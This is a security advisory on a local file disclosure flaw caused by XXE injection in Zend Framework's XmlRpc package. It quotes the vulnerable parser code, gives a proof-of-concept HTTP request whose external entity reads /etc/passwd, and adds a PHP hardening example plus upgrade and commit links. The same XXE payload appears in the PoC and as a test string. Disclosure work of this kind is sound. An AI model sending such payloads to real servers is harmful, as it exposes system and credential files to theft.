Title: Local file disclosure via XXE injection
Affected products: Zend Framework
Affected versions: 1.11.11, 1.12.0 RC1, 2.0.0 beta4 and earlier versions/branches
Fixed versions: 1.11.12, 1.12.0 RC2, 2.0.0 beta5/trunk
Discoverer: K. Gudinavicius, SEC Consult Vulnerability Lab
Vendor description:
-------------------
"Extending the art & spirit of PHP, Zend Framework is based on simplicity,
object-oriented best practices, corporate friendly licensing, and a rigorously
tested agile codebase. Zend Framework is focused on building more secure,
reliable, and modern Web 2.0 applications & web services, and consuming widely
available APIs from leading vendors like Google, Amazon, Yahoo!, Flickr, as
well as API providers and cataloguers like StrikeIron and ProgrammableWeb."
From: http://framework.zend.com/about/overview
Vulnerability overview:
-----------------------
The XmlRpc package of Zend Framework is vulnerable to XML eXternal Entity
(XXE) injection attacks, on both the server and the client side. The
SimpleXMLElement class (SimpleXML PHP extension) is used in an insecure way to
parse XML data: external entities can be declared by adding a DOCTYPE
declaration to an XML-RPC request, and the parser resolves them. By exploiting
this vulnerability an application can be coerced into opening arbitrary files
and/or TCP connections.
Other software that builds on the XmlRpc package of Zend Framework is therefore
also vulnerable to XML eXternal Entity injection attacks!
Proof of concept:
-----------------
For example, the loadXml function (Zend\XmlRpc\Request.php and Response.php)
fails to disable external entities when parsing XML data: there is no call to
the libxml_disable_entity_loader function before the SimpleXMLElement class
is instantiated. Related code excerpt (vulnerable version):
    public function loadXml($request)
    {
        if (!is_string($request)) {
            $this->_fault = new Zend_XmlRpc_Fault(635);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }

        try {
            // No libxml_disable_entity_loader(true) before this line, so any
            // external entity declared in a DOCTYPE is resolved by the parser.
            $xml = new SimpleXMLElement($request);
        } catch (Exception $e) {
            // not valid XML
            $this->_fault = new Zend_XmlRpc_Fault(631);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }
        [...]
    }
If a web application uses the Zend_XmlRpc_Server class
(Zend\XmlRpc\Server.php) to handle XML-RPC requests, it is possible to
disclose arbitrary local files from the remote system. The following HTTP POST
request to a vulnerable XML-RPC server application demonstrates the
exploitation of this vulnerability.
POST /xmlrpc_server.php HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
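The hardening the advisory describes (disable the libxml external entity loader before handing the request to SimpleXMLElement), written out as an added example that is not Zend Framework code. The function name loadXmlRpcSafely and the two constructed request strings are assumptions for illustration; the DOCTYPE rejection goes a step beyond the excerpt, since an XML-RPC request never legitimately needs a DTD.

```php
<?php
// Added example, not Zend Framework code: an XML-RPC request loader that
// refuses the DOCTYPE/ENTITY construct the advisory's PoC relies on and
// keeps libxml from resolving external entities at all.
declare(strict_types=1);

function loadXmlRpcSafely(string $request): ?SimpleXMLElement
{
    // A DOCTYPE is the only place an <!ENTITY ... SYSTEM "..."> declaration
    // can live, and XML-RPC never needs a DTD, so reject it outright.
    if (preg_match('/<!DOCTYPE/i', $request) === 1) {
        return null;
    }
    // Before PHP 8.0 libxml resolves external entities by default; switch the
    // loader off around the parse and restore the previous setting afterwards.
    // PHP 8.0+ ships with the loader disabled and deprecates this call.
    $previousLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoader = libxml_disable_entity_loader(true);
    }
    $previousErrors = libxml_use_internal_errors(true);
    try {
        // LIBXML_NONET additionally forbids network access while parsing.
        // Never pass LIBXML_NOENT here: that flag *enables* entity substitution.
        $xml = new SimpleXMLElement($request, LIBXML_NONET);
    } catch (Exception $e) {
        return null;                          // not well-formed XML
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previousErrors);
        if ($previousLoader !== null) {
            libxml_disable_entity_loader($previousLoader);
        }
    }
    // Only a <methodCall> root is acceptable for a server-side request.
    return $xml->getName() === 'methodCall' ? $xml : null;
}

// Constructed inputs: the shape of the advisory's payload, and a benign request.
$hostile = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
         . '<methodCall><methodName>&xxe;</methodName></methodCall>';
$benign  = '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName>'
         . '<params/></methodCall>';

var_dump(loadXmlRpcSafely($hostile));                      // rejected: NULL
var_dump((string) loadXmlRpcSafely($benign)->methodName);  // parsed normally
```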
Solution:
---------
Upgrade to the latest version, such as:
* v1.11.12
* v1.12.0 RC2
* current ZF2 master trunk
If you are using an older branch you are urged to upgrade!
Zend Framework security advisory:
http://framework.zend.com/security/advisory/ZF2012-01
Download link for new releases:
http://framework.zend.com/download/latest
Commits:
--------
http://framework.zend.com/code/log.php?repname=Zend+Framework&path=%2F
* Zend Framework 1.x
Trunk:
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Ftrunk&rev=24970&peg=24970
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24975
* 1.11.x:
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24971&peg=24971
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24972&peg=24972
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24976
* 1.12.0:
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24973&peg=24973
http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24977
* Zend Framework 2.0
https://github.com/zendframework/zf2/pull/1523